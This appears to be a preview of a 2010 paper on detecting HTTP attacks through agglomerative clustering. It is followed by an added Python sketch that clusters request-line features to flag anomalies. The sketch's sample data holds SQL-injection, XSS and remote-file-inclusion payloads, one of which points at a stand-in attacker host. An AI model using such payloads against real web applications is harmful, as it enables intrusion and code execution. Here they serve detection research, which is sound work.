Clustering Toward Detecting Cyber Attacks

Clustering Toward Detecting Cyber Attacks - 2010...

Clustering Toward Detecting Cyber Attacks

Xiaofeng Yang, Wei Li, Mingming Sun, Xuelei Hu, Shuqin Li
School of Computer Science and Technology, Nanjing University of Science and Technology, Nanjing, China

Yongzhi Li
Department of Information and Computer Science, Nanjing Forestry University, Nanjing, China
E-mail: yzli@njfu.com.cn

Abstract — Several anomaly detection methods have been proposed to cope with the recent boom in HTTP-related vulnerabilities, which has led to security breaches in many vital HTTP-based services on the internet. This paper proposes a novel bottom-up agglomerative clustering method which not only spares the nuisance of a learning process that involves a large amount of manual sample tagging, but also shows much stronger adaptiveness, being able to cope with varying situations and to detect new samples.

Keywords: agglomerative clustering; intrusion detection; HTTP attacks; data mining

I. INTRODUCTION

The Hypertext Transfer Protocol (HTTP)[3] has become much more widely used in recent years. More applications are designed to run as web services and are deployed across the internet, using HTTP as their standard communication protocol; examples include news publishing, bank transactions, email processing and file transfer. The thriving trend of web services and their popularity ensure that people depend more heavily on HTTP-based web applications to carry out their business. The popularity of HTTP applications is a big motive for attackers to exploit HTTP-related vulnerabilities. The latest released CVE vulnerability trends[1] point out that three typical HTTP-related attacks, namely Cross Site Scripting (XSS), SQL injection and Remote File Inclusion (RFI), account for more than half of the total reported vulnerabilities. As the report also pointed out, this was mainly due to the ease of probing and exploiting web vulnerabilities, combined with the proliferation of web service applications developed by inexperienced coders.
To detect attacks, the traditional Intrusion Detection System (IDS) has long been used as a key security instrument. It is configured with a large number of signatures to detect known attacks. The sharp increase in vulnerabilities immediately drives up the number of IDS signatures, as in the case of Snort[2], which raises the cost of detection and lowers network throughput. The dilemma was partly solved by anomaly detection, which builds normal behavior patterns rather than modeling every known attack. However, the performance of anomaly methods depends heavily on how representative the collected samples are and on the accuracy of human tagging.(1) Furthermore, one model learned from a given sample set applies only to very limited detection situations. In this paper, we propose a bottom-up agglomerative

(1) Corresponding authors: Xiaofeng YANG yangxf.nj@gmail.com; Yongzhi LI yzli@njfu.com.cn
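To make the idea concrete, here is an added example (my own sketch, not the paper's algorithm, whose details are not in this preview): single-linkage bottom-up agglomerative clustering over a few structural features of HTTP request lines, with very small clusters reported as anomalous, so no tagged training set is needed. The request lines, the four features, the merge threshold of 6.0 and the minimum cluster size of 3 are all assumptions made for the illustration.

```python
# Added example, not the paper's code: single-linkage bottom-up agglomerative
# clustering of HTTP request features; tiny clusters are reported as anomalies.
import math
from urllib.parse import urlsplit, parse_qsl
# Constructed sample request lines (not real traffic): five routine lookups
# and three whose parameter values are SQL-injection-, XSS- and RFI-shaped.
REQUESTS = [
    "GET /news/index.php?id=12 HTTP/1.1",
    "GET /news/index.php?id=13 HTTP/1.1",
    "GET /news/index.php?id=14 HTTP/1.1",
    "GET /account/view.php?user=alice HTTP/1.1",
    "GET /account/view.php?user=bob HTTP/1.1",
    "GET /news/index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1",
    "GET /news/index.php?id=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1",
    "GET /news/index.php?id=http://evil.example/shell.txt HTTP/1.1",
]

def features(request_line):
    # Four assumed features: path length, parameter count, longest decoded
    # value, and count of non-alphanumeric characters across all values.
    target = request_line.split(" ")[1]
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    values = "".join(v for _, v in params)
    return (len(parts.path), len(params),
            max((len(v) for _, v in params), default=0),
            sum(not c.isalnum() for c in values))

def agglomerate(points, threshold):
    # Single linkage: every point starts as its own cluster; merge the pair
    # whose closest members are nearest until no pair is within threshold.
    clusters = [[i] for i in range(len(points))]
    while len(clusters) > 1:
        best = None
        for a in range(len(clusters)):
            for b in range(a + 1, len(clusters)):
                d = min(math.dist(points[i], points[j])
                        for i in clusters[a] for j in clusters[b])
                if best is None or d < best[0]:
                    best = (d, a, b)
        if best[0] > threshold:
            break
        clusters[best[1]].extend(clusters.pop(best[2]))
    return clusters

def detect(requests, threshold=6.0, min_size=3):
    # Requests in clusters smaller than min_size are flagged as anomalous.
    points = [features(r) for r in requests]
    clusters = agglomerate(points, threshold)
    flagged = sorted(i for c in clusters if len(c) < min_size for i in c)
    return clusters, flagged
```

With these inputs, detect(REQUESTS) keeps the five routine requests in one cluster and flags the last three, which end up in two clusters of sizes 2 and 1; the threshold and minimum size are where such a method's sensitivity is tuned.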